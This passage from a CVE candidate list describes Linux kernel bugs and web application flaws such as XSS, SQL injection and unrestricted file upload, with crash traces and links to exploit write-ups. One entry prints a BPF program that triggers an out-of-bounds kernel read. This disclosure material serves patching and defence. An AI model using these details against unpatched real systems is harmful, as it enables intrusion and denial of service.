__x64_sys_bpf+0x1c/0x30 do_syscall_64+0x41/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76 Return -EINVAL in this situation. MISC:https://git.kernel.org/stable/c/50ae82f080cf87e84828f066c31723b781d68f5b | URL:https://git.kernel.org/stable/c/50ae82f080cf87e84828f066c31723b781d68f5b | MISC:https://git.kernel.org/stable/c/6cc9c0af0aa06f781fa515a1734b1a4239dfd2c0 | URL:https://git.kernel.org/stable/c/6cc9c0af0aa06f781fa515a1734b1a4239dfd2c0 | MISC:https://git.kernel.org/stable/c/715d82ba636cb3629a6e18a33bb9dbe53f9936ee | URL:https://git.kernel.org/stable/c/715d82ba636cb3629a6e18a33bb9dbe53f9936ee | MISC:https://git.kernel.org/stable/c/8c8bcd45e9b10eef12321f08d2e5be33d615509c | URL:https://git.kernel.org/stable/c/8c8bcd45e9b10eef12321f08d2e5be33d615509c | MISC:https://git.kernel.org/stable/c/a7b98aa10f895e2569403896f2d19b73b6c95653 | URL:https://git.kernel.org/stable/c/a7b98aa10f895e2569403896f2d19b73b6c95653 Assigned (20240219)
CVE 2024 26590 Candidate In the Linux kernel, the following vulnerability has been resolved: erofs: fix inconsistent per-file compression format EROFS can select compression algorithms on a per-file basis, and each per-file compression algorithm needs to be marked in the on-disk superblock for initialization. However, syzkaller can generate inconsistent crafted images that use an unsupported algorithmtype for specific inodes, e.g. use MicroLZMA algorithmtype even it's not set in `sbi->available_compr_algs`. This can lead to an unexpected "BUG: kernel NULL pointer dereference" if the corresponding decompressor isn't built-in. Fix this by checking against `sbi->available_compr_algs` for each m_algorithmformat request. Incorrect !erofs_sb_has_compr_cfgs preset bitmap is now fixed together since it was harmless previously. MISC:https://git.kernel.org/stable/c/118a8cf504d7dfa519562d000f423ee3ca75d2c4 | URL:https://git.kernel.org/stable/c/118a8cf504d7dfa519562d000f423ee3ca75d2c4 | MISC:https://git.kernel.org/stable/c/47467e04816cb297905c0f09bc2d11ef865942d9 | URL:https://git.kernel.org/stable/c/47467e04816cb297905c0f09bc2d11ef865942d9 | MISC:https://git.kernel.org/stable/c/823ba1d2106019ddf195287ba53057aee33cf724 | URL:https://git.kernel.org/stable/c/823ba1d2106019ddf195287ba53057aee33cf724 | MISC:https://git.kernel.org/stable/c/eed24b816e50c6cd18cbee0ff0d7218c8fced199 | URL:https://git.kernel.org/stable/c/eed24b816e50c6cd18cbee0ff0d7218c8fced199 Assigned (20240219)
CVE 2024 26589 Candidate In the Linux kernel, the following vulnerability has been resolved: bpf: Reject variable offset alu on PTR_TO_FLOW_KEYS For PTR_TO_FLOW_KEYS, check_flow_keys_access() only uses fixed off for validation. However, variable offset ptr alu is not prohibited for this ptr kind. So the variable offset is not checked. The following prog is accepted: func#0 @0 0: R1=ctx() R10=fp0 0: (bf) r6 = r1 ; R1=ctx() R6_w=ctx() 1: (79) r7 = *(u64 *)(r6 +144) ; R6_w=ctx() R7_w=flow_keys() 2: (b7) r8 = 1024 ; R8_w=1024 3: (37) r8 /= 1 ; R8_w=scalar() 4: (57) r8 &= 1024 ; R8_w=scalar(smin=smin32=0, smax=umax=smax32=umax32=1024,var_off=(0x0; 0x400)) 5: (0f) r7 += r8 mark_precise: frame0: last_idx 5 first_idx 0 subseq_idx -1 mark_precise: frame0: regs=r8 stack= before 4: (57) r8 &= 1024 mark_precise: frame0: regs=r8 stack= before 3: (37) r8 /= 1 mark_precise: frame0: regs=r8 stack= before 2: (b7) r8 = 1024 6: R7_w=flow_keys(smin=smin32=0,smax=umax=smax32=umax32=1024,var_off =(0x0; 0x400)) R8_w=scalar(smin=smin32=0,smax=umax=smax32=umax32=1024, var_off=(0x0; 0x400)) 6: (79) r0 = *(u64 *)(r7 +0) ; R0_w=scalar() 7: (95) exit This prog loads flow_keys to r7, and adds the variable offset r8 to r7, and finally causes out-of-bounds access: BUG: unable to handle page fault for address: ffffc90014c80038 [...] Call Trace: <TASK> bpf_dispatcher_nop_func include/linux/bpf.h:1231 [inline] __bpf_prog_run include/linux/filter.h:651 [inline] bpf_prog_run include/linux/filter.h:658 [inline] bpf_prog_run_pin_on_cpu include/linux/filter.h:675 [inline] bpf_flow_dissect+0x15f/0x350 net/core/flow_dissector.c:991 bpf_prog_test_run_flow_dissector+0x39d/0x620 net/bpf/test_run.c:1359 bpf_prog_test_run kernel/bpf/syscall.c:4107 [inline] __sys_bpf+0xf8f/0x4560 kernel/bpf/syscall.c:5475 __do_sys_bpf kernel/bpf/syscall.c:5561 [inline] __se_sys_bpf kernel/bpf/syscall.c:5559 [inline] __x64_sys_bpf+0x73/0xb0 kernel/bpf/syscall.c:5559 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x3f/0x110 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b Fix this by rejecting ptr alu with variable offset on flow_keys. Applying the patch rejects the program with "R7 pointer arithmetic on flow_keys prohibited". MISC:https://git.kernel.org/stable/c/1b500d5d6cecf98dd6ca88bc9e7ae1783c83e6d3 | URL:https://git.kernel.org/stable/c/1b500d5d6cecf98dd6ca88bc9e7ae1783c83e6d3 | MISC:https://git.kernel.org/stable/c/22c7fa171a02d310e3a3f6ed46a698ca8a0060ed | URL:https://git.kernel.org/stable/c/22c7fa171a02d310e3a3f6ed46a698ca8a0060ed | MISC:https://git.kernel.org/stable/c/29ffa63f21bcdcef3e36b03cccf9d0cd031f6ab0 | URL:https://git.kernel.org/stable/c/29ffa63f21bcdcef3e36b03cccf9d0cd031f6ab0 | MISC:https://git.kernel.org/stable/c/4108b86e324da42f7ed425bd71632fd844300dc8 | URL:https://git.kernel.org/stable/c/4108b86e324da42f7ed425bd71632fd844300dc8 | MISC:https://git.kernel.org/stable/c/e8d3872b617c21100c5ee4f64e513997a68c2e3d | URL:https://git.kernel.org/stable/c/e8d3872b617c21100c5ee4f64e513997a68c2e3d Assigned (20240219)
CVE 2024 26588 Candidate In the Linux kernel, the following vulnerability has been resolved: LoongArch: BPF: Prevent out-of-bounds memory access The test_tag test triggers an unhandled page fault: # ./test_tag [ 130.640218] CPU 0 Unable to handle kernel paging request at virtual address ffff80001b898004, era == 9000000003137f7c, ra == 9000000003139e70 [ 130.640501] Oops[#3]: [ 130.640553] CPU: 0 PID: 1326 Comm: test_tag Tainted: G D O 6.7.0-rc4-loong-devel-gb62ab1a397cf #47 61985c1d94084daa2432f771daa45b56b10d8d2a [ 130.640764] Hardware name: QEMU QEMU Virtual Machine, BIOS unknown 2/2/2022 [ 130.640874] pc 9000000003137f7c ra 9000000003139e70 tp 9000000104cb4000 sp 9000000104cb7a40 [ 130.641001] a0 ffff80001b894000 a1 ffff80001b897ff8 a2 000000006ba210be a3 0000000000000000 [ 130.641128] a4 000000006ba210be a5 00000000000000f1 a6 00000000000000b3 a7 0000000000000000 [ 130.641256] t0 0000000000000000 t1 00000000000007f6 t2 0000000000000000 t3 9000000004091b70 [ 130.641387] t4 000000006ba210be t5 0000000000000004 t6 fffffffffffffff0 t7 90000000040913e0 [ 130.641512] t8 0000000000000005 u0 0000000000000dc0 s9 0000000000000009 s0 9000000104cb7ae0 [ 130.641641] s1 00000000000007f6 s2 0000000000000009 s3 0000000000000095 s4 0000000000000000 [ 130.641771] s5 ffff80001b894000 s6 ffff80001b897fb0 s7 9000000004090c50 s8 0000000000000000 [ 130.641900] ra: 9000000003139e70 build_body+0x1fcc/0x4988 [ 130.642007] ERA: 9000000003137f7c build_body+0xd8/0x4988 [ 130.642112] CRMD: 000000b0 (PLV0 -IE -DA +PG DACF=CC DACM=CC -WE) [ 130.642261] PRMD: 00000004 (PPLV0 +PIE -PWE) [ 130.642353] EUEN: 00000003 (+FPE +SXE -ASXE -BTE) [ 130.642458] ECFG: 00071c1c (LIE=2-4,10-12 VS=7) [ 130.642554] ESTAT: 00010000 [PIL] (IS= ECode=1 EsubCode=0) [ 130.642658] BADV: ffff80001b898004 [ 130.642719] PRID: 0014c010 (Loongson-64bit, Loongson-3A5000) [ 130.642815] Modules linked in: [last unloaded: bpf_testmod(O)] [ 130.642924] Process test_tag (pid: 1326, threadinfo=00000000f7f4015f, task=000000006499f9fd) [ 130.643062] Stack : 0000000000000000 9000000003380724 0000000000000000 0000000104cb7be8 [ 130.643213] 0000000000000000 25af8d9b6e600558 9000000106250ea0 9000000104cb7ae0 [ 130.643378] 0000000000000000 0000000000000000 9000000104cb7be8 90000000049f6000 [ 130.643538] 0000000000000090 9000000106250ea0 ffff80001b894000 ffff80001b894000 [ 130.643685] 00007ffffb917790 900000000313ca94 0000000000000000 0000000000000000 [ 130.643831] ffff80001b894000 0000000000000ff7 0000000000000000 9000000100468000 [ 130.643983] 0000000000000000 0000000000000000 0000000000000040 25af8d9b6e600558 [ 130.644131] 0000000000000bb7 ffff80001b894048 0000000000000000 0000000000000000 [ 130.644276] 9000000104cb7be8 90000000049f6000 0000000000000090 9000000104cb7bdc [ 130.644423] ffff80001b894000 0000000000000000 00007ffffb917790 90000000032acfb0 [ 130.644572] ... [ 130.644629] Call Trace: [ 130.644641] [<9000000003137f7c>] build_body+0xd8/0x4988 [ 130.644785] [<900000000313ca94>] bpf_int_jit_compile+0x228/0x4ec [ 130.644891] [<90000000032acfb0>] bpf_prog_select_runtime+0x158/0x1b0 [ 130.645003] [<90000000032b3504>] bpf_prog_load+0x760/0xb44 [ 130.645089] [<90000000032b6744>] __sys_bpf+0xbb8/0x2588 [ 130.645175] [<90000000032b8388>] sys_bpf+0x20/0x2c [ 130.645259] [<9000000003f6ab38>] do_syscall+0x7c/0x94 [ 130.645369] [<9000000003121c5c>] handle_syscall+0xbc/0x158 [ 130.645507] [ 130.645539] Code: 380839f6 380831f9 28412bae <24000ca6> 004081ad 0014cb50 004083e8 02bff34c 58008e91 [ 130.645729] [ 130.646418] ---[ end trace 0000000000000000 ]--- On my machine, which has CONFIG_PAGE_SIZE_16KB=y, the test failed at loading a BPF prog with 2039 instructions: prog = (struct bpf_prog *)ffff80001b894000 insn = (struct bpf_insn *)(prog->insnsi)fff ---truncated--- MISC:https://git.kernel.org/stable/c/36a87385e31c9343af9a4756598e704741250a67 | URL:https://git.kernel.org/stable/c/36a87385e31c9343af9a4756598e704741250a67 | MISC:https://git.kernel.org/stable/c/4631c2dd69d928bca396f9f58baeddf85e14ced5 | URL:https://git.kernel.org/stable/c/4631c2dd69d928bca396f9f58baeddf85e14ced5 | MISC:https://git.kernel.org/stable/c/7924ade13a49c0067da6ea13e398102979c0654a | URL:https://git.kernel.org/stable/c/7924ade13a49c0067da6ea13e398102979c0654a | MISC:https://git.kernel.org/stable/c/9aeb09f4d85a87bac46c010d75a2ea299d462f28 | URL:https://git.kernel.org/stable/c/9aeb09f4d85a87bac46c010d75a2ea299d462f28 Assigned (20240219)
CVE 2024 26587 Candidate In the Linux kernel, the following vulnerability has been resolved: net: netdevsim: don't try to destroy PHC on VFs PHC gets initialized in nsim_init_netdevsim(), which is only called if (nsim_dev_port_is_pf()). Create a counterpart of nsim_init_netdevsim() and move the mock_phc_destroy() there. This fixes a crash trying to destroy netdevsim with VFs instantiated, as caught by running the devlink.sh test: BUG: kernel NULL pointer dereference, address: 00000000000000b8 RIP: 0010:mock_phc_destroy+0xd/0x30 Call Trace: <TASK> nsim_destroy+0x4a/0x70 [netdevsim] __nsim_dev_port_del+0x47/0x70 [netdevsim] nsim_dev_reload_destroy+0x105/0x120 [netdevsim] nsim_drv_remove+0x2f/0xb0 [netdevsim] device_release_driver_internal+0x1a1/0x210 bus_remove_device+0xd5/0x120 device_del+0x159/0x490 device_unregister+0x12/0x30 del_device_store+0x11a/0x1a0 [netdevsim] kernfs_fop_write_iter+0x130/0x1d0 vfs_write+0x30b/0x4b0 ksys_write+0x69/0xf0 do_syscall_64+0xcc/0x1e0 entry_SYSCALL_64_after_hwframe+0x6f/0x77 MISC:https://git.kernel.org/stable/c/08aca65997fb6f233066883b1f1e653bcb1f26ca | URL:https://git.kernel.org/stable/c/08aca65997fb6f233066883b1f1e653bcb1f26ca | MISC:https://git.kernel.org/stable/c/c5068e442eed063d2f1658e6b6d3c1c6fcf1e588 | URL:https://git.kernel.org/stable/c/c5068e442eed063d2f1658e6b6d3c1c6fcf1e588 | MISC:https://git.kernel.org/stable/c/ea937f77208323d35ffe2f8d8fc81b00118bfcda | URL:https://git.kernel.org/stable/c/ea937f77208323d35ffe2f8d8fc81b00118bfcda Assigned (20240219)
CVE 2024 26586 Candidate In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix stack corruption When tc filters are first added to a net device, the corresponding local port gets bound to an ACL group in the device. The group contains a list of ACLs. In turn, each ACL points to a different TCAM region where the filters are stored. During forwarding, the ACLs are sequentially evaluated until a match is found. One reason to place filters in different regions is when they are added with decreasing priorities and in an alternating order so that two consecutive filters can never fit in the same region because of their key usage. In Spectrum-2 and newer ASICs the firmware started to report that the maximum number of ACLs in a group is more than 16, but the layout of the register that configures ACL groups (PAGT) was not updated to account for that. It is therefore possible to hit stack corruption [1] in the rare case where more than 16 ACLs in a group are required. Fix by limiting the maximum ACL group size to the minimum between what the firmware reports and the maximum ACLs that fit in the PAGT register. Add a test case to make sure the machine does not crash when this condition is hit. [1] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: mlxsw_sp_acl_tcam_group_update+0x116/0x120 [...] dump_stack_lvl+0x36/0x50 panic+0x305/0x330 __stack_chk_fail+0x15/0x20 mlxsw_sp_acl_tcam_group_update+0x116/0x120 mlxsw_sp_acl_tcam_group_region_attach+0x69/0x110 mlxsw_sp_acl_tcam_vchunk_get+0x492/0xa20 mlxsw_sp_acl_tcam_ventry_add+0x25/0xe0 mlxsw_sp_acl_rule_add+0x47/0x240 mlxsw_sp_flower_replace+0x1a9/0x1d0 tc_setup_cb_add+0xdc/0x1c0 fl_hw_replace_filter+0x146/0x1f0 fl_change+0xc17/0x1360 tc_new_tfilter+0x472/0xb90 rtnetlink_rcv_msg+0x313/0x3b0 netlink_rcv_skb+0x58/0x100 netlink_unicast+0x244/0x390 netlink_sendmsg+0x1e4/0x440 ____sys_sendmsg+0x164/0x260 ___sys_sendmsg+0x9a/0xe0 __sys_sendmsg+0x7a/0xc0 do_syscall_64+0x40/0xe0 entry_SYSCALL_64_after_hwframe+0x63/0x6b MISC:https://git.kernel.org/stable/c/2f5e1565740490706332c06f36211d4ce0f88e62 | URL:https://git.kernel.org/stable/c/2f5e1565740490706332c06f36211d4ce0f88e62 | MISC:https://git.kernel.org/stable/c/348112522a35527c5bcba933b9fefb40a4f44f15 | URL:https://git.kernel.org/stable/c/348112522a35527c5bcba933b9fefb40a4f44f15 | MISC:https://git.kernel.org/stable/c/483ae90d8f976f8339cf81066312e1329f2d3706 | URL:https://git.kernel.org/stable/c/483ae90d8f976f8339cf81066312e1329f2d3706 | MISC:https://git.kernel.org/stable/c/56750ea5d15426b5f307554e7699e8b5f76c3182 | URL:https://git.kernel.org/stable/c/56750ea5d15426b5f307554e7699e8b5f76c3182 | MISC:https://git.kernel.org/stable/c/6fd24675188d354b1cad47462969afa2ab09d819 | URL:https://git.kernel.org/stable/c/6fd24675188d354b1cad47462969afa2ab09d819 | MISC:https://git.kernel.org/stable/c/a361c2c1da5dbb13ca67601cf961ab3ad68af383 | URL:https://git.kernel.org/stable/c/a361c2c1da5dbb13ca67601cf961ab3ad68af383 Assigned (20240219)
CVE 2024 26585 Candidate In the Linux kernel, the following vulnerability has been resolved: tls: fix race between tx work scheduling and socket close Similarly to previous commit, the submitting thread (recvmsg/sendmsg) may exit as soon as the async crypto handler calls complete(). Reorder scheduling the work before calling complete(). This seems more logical in the first place, as it's the inverse order of what the submitting thread will do. MISC:https://git.kernel.org/stable/c/6db22d6c7a6dc914b12c0469b94eb639b6a8a146 | URL:https://git.kernel.org/stable/c/6db22d6c7a6dc914b12c0469b94eb639b6a8a146 | MISC:https://git.kernel.org/stable/c/e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb | URL:https://git.kernel.org/stable/c/e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb | MISC:https://git.kernel.org/stable/c/e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57 | URL:https://git.kernel.org/stable/c/e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57 Assigned (20240219)
CVE 2024 26584 Candidate In the Linux kernel, the following vulnerability has been resolved: net: tls: handle backlogging of crypto requests Since we're setting the CRYPTO_TFM_REQ_MAY_BACKLOG flag on our requests to the crypto API, crypto_aead_{encrypt,decrypt} can return -EBUSY instead of -EINPROGRESS in valid situations. For example, when the cryptd queue for AESNI is full (easy to trigger with an artificially low cryptd.cryptd_max_cpu_qlen), requests will be enqueued to the backlog but still processed. In that case, the async callback will also be called twice: first with err == -EINPROGRESS, which it seems we can just ignore, then with err == 0. Compared to Sabrina's original patch this version uses the new tls_*crypt_async_wait() helpers and converts the EBUSY to EINPROGRESS to avoid having to modify all the error handling paths. The handling is identical. MISC:https://git.kernel.org/stable/c/13eca403876bbea3716e82cdfe6f1e6febb38754 | URL:https://git.kernel.org/stable/c/13eca403876bbea3716e82cdfe6f1e6febb38754 | MISC:https://git.kernel.org/stable/c/8590541473188741055d27b955db0777569438e3 | URL:https://git.kernel.org/stable/c/8590541473188741055d27b955db0777569438e3 | MISC:https://git.kernel.org/stable/c/ab6397f072e5097f267abf5cb08a8004e6b17694 | URL:https://git.kernel.org/stable/c/ab6397f072e5097f267abf5cb08a8004e6b17694 Assigned (20240219)
CVE 2024 26583 Candidate In the Linux kernel, the following vulnerability has been resolved: tls: fix race between async notify and socket close The submitting thread (one which called recvmsg/sendmsg) may exit as soon as the async crypto handler calls complete() so any code past that point risks touching already freed data. Try to avoid the locking and extra flags altogether. Have the main thread hold an extra reference, this way we can depend solely on the atomic ref counter for synchronization. Don't futz with reiniting the completion, either, we are now tightly controlling when completion fires. MISC:https://git.kernel.org/stable/c/6209319b2efdd8524691187ee99c40637558fa33 | URL:https://git.kernel.org/stable/c/6209319b2efdd8524691187ee99c40637558fa33 | MISC:https://git.kernel.org/stable/c/7a3ca06d04d589deec81f56229a9a9d62352ce01 | URL:https://git.kernel.org/stable/c/7a3ca06d04d589deec81f56229a9a9d62352ce01 | MISC:https://git.kernel.org/stable/c/86dc27ee36f558fe223dbdfbfcb6856247356f4a | URL:https://git.kernel.org/stable/c/86dc27ee36f558fe223dbdfbfcb6856247356f4a | MISC:https://git.kernel.org/stable/c/aec7961916f3f9e88766e2688992da6980f11b8d | URL:https://git.kernel.org/stable/c/aec7961916f3f9e88766e2688992da6980f11b8d Assigned (20240219)
CVE 2024 26582 Candidate In the Linux kernel, the following vulnerability has been resolved: net: tls: fix use-after-free with partial reads and async decrypt tls_decrypt_sg doesn't take a reference on the pages from clear_skb, so the put_page() in tls_decrypt_done releases them, and we trigger a use-after-free in process_rx_list when we try to read from the partially-read skb. MISC:https://git.kernel.org/stable/c/20b4ed034872b4d024b26e2bc1092c3f80e5db96 | URL:https://git.kernel.org/stable/c/20b4ed034872b4d024b26e2bc1092c3f80e5db96 | MISC:https://git.kernel.org/stable/c/32b55c5ff9103b8508c1e04bfa5a08c64e7a925f | URL:https://git.kernel.org/stable/c/32b55c5ff9103b8508c1e04bfa5a08c64e7a925f | MISC:https://git.kernel.org/stable/c/754c9bab77a1b895b97bd99d754403c505bc79df | URL:https://git.kernel.org/stable/c/754c9bab77a1b895b97bd99d754403c505bc79df | MISC:https://git.kernel.org/stable/c/d684763534b969cca1022e2a28645c7cc91f7fa5 | URL:https://git.kernel.org/stable/c/d684763534b969cca1022e2a28645c7cc91f7fa5 Assigned (20240219)
CVE 2024 26581 Candidate In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_rbtree: skip end interval element from gc rbtree lazy gc on insert might collect an end interval element that has been just added in this transactions, skip end interval elements that are not yet active. MISC:https://git.kernel.org/stable/c/10e9cb39313627f2eae4cd70c4b742074e998fd8 | URL:https://git.kernel.org/stable/c/10e9cb39313627f2eae4cd70c4b742074e998fd8 | MISC:https://git.kernel.org/stable/c/1296c110c5a0b45a8fcf58e7d18bc5da61a565cb | URL:https://git.kernel.org/stable/c/1296c110c5a0b45a8fcf58e7d18bc5da61a565cb | MISC:https://git.kernel.org/stable/c/2bab493a5624444ec6e648ad0d55a362bcb4c003 | URL:https://git.kernel.org/stable/c/2bab493a5624444ec6e648ad0d55a362bcb4c003 | MISC:https://git.kernel.org/stable/c/4cee42fcf54fec46b344681e7cc4f234bb22f85a | URL:https://git.kernel.org/stable/c/4cee42fcf54fec46b344681e7cc4f234bb22f85a | MISC:https://git.kernel.org/stable/c/60c0c230c6f046da536d3df8b39a20b9a9fd6af0 | URL:https://git.kernel.org/stable/c/60c0c230c6f046da536d3df8b39a20b9a9fd6af0 | MISC:https://git.kernel.org/stable/c/6eb14441f10602fa1cf691da9d685718b68b78a9 | URL:https://git.kernel.org/stable/c/6eb14441f10602fa1cf691da9d685718b68b78a9 | MISC:https://git.kernel.org/stable/c/b734f7a47aeb32a5ba298e4ccc16bb0c52b6dbf7 | URL:https://git.kernel.org/stable/c/b734f7a47aeb32a5ba298e4ccc16bb0c52b6dbf7 Assigned (20240219)
CVE 2024 26580 Candidate Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong: from 1.8.0 through 1.10.0, the attackers can use the specific payload to read from an arbitrary file. Users are advised to upgrade to Apache InLong's 1.11.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9673 MISC:https://lists.apache.org/thread/xvomf66l58x4dmoyzojflvx52gkzcdmk | URL:https://lists.apache.org/thread/xvomf66l58x4dmoyzojflvx52gkzcdmk Assigned (20240219)
CVE 2024 26578 Candidate Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1. Repeated submission during registration resulted in the registration of the same user. When users register, if they rapidly submit multiple registrations using scripts, it can result in the creation of multiple user accounts simultaneously with the same name. Users are recommended to upgrade to version [1.2.5], which fixes the issue. MISC:https://lists.apache.org/thread/ko0ksnznt2484lxt0zts2ygr82ldkhcb | URL:https://lists.apache.org/thread/ko0ksnznt2484lxt0zts2ygr82ldkhcb | MLIST:[oss-security] 20240222 CVE-2024-26578: Apache Answer: Repeated submission at registration created duplicate users with the same name | URL:http://www.openwall.com/lists/oss-security/2024/02/22/3 Assigned (20240219)
CVE 2024 26566 Candidate An issue in Cute Http File Server v.3.1 allows a remote attacker to escalate privileges via the password verification component. MISC:http://cute.com | MISC:https://github.com/GZLDL/CVE/blob/main/CVE-2024-26566/CVE-2024-26566%20English.md | MISC:https://github.com/GZLDL/CVE/tree/main/Cute%20Http%20File%20Server%20JWT Assigned (20240219)
CVE 2024 26559 Candidate An issue in uverif v.2.0 allows a remote attacker to obtain sensitive information. MISC:https://syst1m.cn/2024/01/22/U%E9%AA%8C%E8%AF%81%E7%BD%91%E7%BB%9C%E7%94%A8%E6%88%B7%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/ Assigned (20240219)
CVE 2024 26557 Candidate Codiad v2.8.4 allows reflected XSS via the components/market/dialog.php type parameter. MISC:https://github.com/Hebing123/cve/issues/18 Assigned (20240219)
CVE 2024 26548 Candidate An issue in vivotek Network Camera v.FD8166A-VVTK-0204j allows a remote attacker to execute arbitrary code via a crafted payload to the upload_file.cgi component. MISC:https://github.com/cwh031600/vivotek/blob/main/vivotek-FD8166A-uploadfile-dos/vivotek-FD8166A-uploadfile-analysis.md Assigned (20240219)
CVE 2024 26542 Candidate Cross Site Scripting vulnerability in Bonitasoft, S.A v.7.14. and fixed in v.9.0.2, 8.0.3, 7.15.7, 7.14.8 allows attackers to execute arbitrary code via a crafted payload to the Groups Display name field. MISC:https://github.com/c0d3x27/CVEs/blob/main/CVE-2024-26542/README.md Assigned (20240219)
CVE 2024 26540 Candidate A heap-based buffer overflow in Clmg before 3.3.3 can occur via a crafted file to cimg_library::CImg<unsigned char>::_load_analyze. MISC:https://github.com/GreycLab/CImg/issues/403 Assigned (20240219)
CVE 2024 26529 Candidate An issue in mz-automation libiec61850 v.1.5.3 and before, allows a remote attacker to cause a denial of service (DoS) via the mmsServer_handleDeleteNamedVariableListRequest function of src/mms/iso_mms/server/mms_named_variable_list_service.c. MISC:https://github.com/mz-automation/libiec61850/issues/492 | MISC:https://github.com/mz-automation/libiec61850/issues/495 Assigned (20240219)
CVE 2024 26521 Candidate HTML Injection vulnerability in CE Phoenix v1.0.8.20 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted payload to the english.php component. MISC:https://github.com/capture0x/Phoenix | MISC:https://github.com/hackervegas001/CVE-2024-26521 Assigned (20240219)
CVE 2024 26503 Candidate Unrestricted File Upload vulnerability in Greek Universities Network Open eClass v.3.15 and earlier allows attackers to run arbitrary code via upload of crafted file to certbadge.php endpoint. MISC:https://www.less-secure.com/2024/03/open-eclass-cve-2024-26503-unrestricted.html Assigned (20240219)
CVE 2024 26492 Candidate An issue in Online Diagnostic Lab Management System 1.0 allows a remote attacker to gain control of a 'Staff' user account via a crafted POST request using the id, email, password, and cpass parameters. MISC:https://packetstormsecurity.com/files/165555/Online-Diagnostic-Lab-Management-System-1.0-Missing-Access-Control.html | MISC:https://www.exploit-db.com/exploits/50660 Assigned (20240219)
CVE 2024 26491 Candidate A cross-site scripting (XSS) vulnerability in the Addon JD Flusity 'Media Gallery with description' module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Gallery name text field. MISC:https://github.com/2111715623/cms/blob/main/1.md Assigned (20240219)
CVE 2024 26490 Candidate A cross-site scripting (XSS) vulnerability in the Addon JD Simple module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title text field. MISC:https://github.com/2111715623/cms/blob/main/2.md Assigned (20240219)
CVE 2024 2649 Candidate A vulnerability has been found in Netentsec NS-ASG Application Security Gateway 6.3 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /protocol/iscdevicestatus/deleteonlineuser.php. The manipulation of the argument messagecontent leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257287. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257287 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257287 | MISC:VDB-257287 | Netentsec NS-ASG Application Security Gateway deleteonlineuser.php sql injection | URL:https://vuldb.com/?id.257287 | MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-deleteonlineuser.md | URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-deleteonlineuser.md Assigned (20240319)
CVE 2024 26489 Candidate A cross-site scripting (XSS) vulnerability in the Addon JD Flusity 'Social block links' module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Profile Name text field. MISC:https://github.com/2111715623/cms/blob/main/3.md Assigned (20240219)
CVE 2024 26484 Candidate ** DISPUTED ** A stored cross-site scripting (XSS) vulnerability in the Edit Content Layout module of Kirby CMS v4.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Link field. NOTE: the vendor's position is that this issue did not affect any version of Kirby CMS. The only effect was on the trykirby.com demo site, which is not customer-controlled. MISC:https://github.com/getkirby/demokit/commit/d4877a6715cbf6517cb04ff57798851ffbd0cd7e | MISC:https://shrouded-trowel-50c.notion.site/Kirby-CMS-4-1-0-Stored-Cross-Site-Scripting-153b4eb557a2488188ad8167734ca226?pvs=4 Assigned (20240219)
CVE 2024 26483 Candidate An arbitrary file upload vulnerability in the Profile Image module of Kirby CMS v4.1.0 allows attackers to execute arbitrary code via a crafted PDF file. MISC:https://github.com/getkirby/kirby/security/advisories/GHSA-xrvh-rvc4-5m43 | MISC:https://shrouded-trowel-50c.notion.site/Kirby-CMS-4-1-0-Unrestricted-File-Upload-dc60ce3132f04442b73f2dba2631fae0?pvs=4 Assigned (20240219)
CVE 2024 26482 Candidate ** DISPUTED ** An HTML injection vulnerability exists in the Edit Content Layout module of Kirby CMS v4.1.0. NOTE: the vendor disputes the significance of this report because some HTML formatting (such as with an H1 element) is allowed, but there is backend sanitization such that the reporter's mentioned "injecting malicious scripts" would not occur. MISC:https://shrouded-trowel-50c.notion.site/Kirby-CMS-4-1-0-HTML-Injection-19ca19686d0a4533ab4b0c53fc977eef?pvs=4 Assigned (20240219)
CVE 2024 26481 Candidate Kirby CMS v4.1.0 was discovered to contain a reflected self-XSS vulnerability via the URL parameter. MISC:https://github.com/getkirby/kirby/security/advisories/GHSA-57f2-8p89-66x6 | MISC:https://shrouded-trowel-50c.notion.site/Kirby-CMS-4-1-0-Self-Cross-Site-Scripting-d877183d20af49f8a8f58554bc06d51c?pvs=4 Assigned (20240219)
CVE 2024 2648 Candidate A vulnerability, which was classified as problematic, was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected is an unknown function of the file /nac/naccheck.php. The manipulation of the argument username leads to improper neutralization of data within xpath expressions. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257286 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257286 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257286 | MISC:VDB-257286 | Netentsec NS-ASG Application Security Gateway naccheck.php xpath injection | URL:https://vuldb.com/?id.257286 | MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-naccheck.md | URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-naccheck.md Assigned 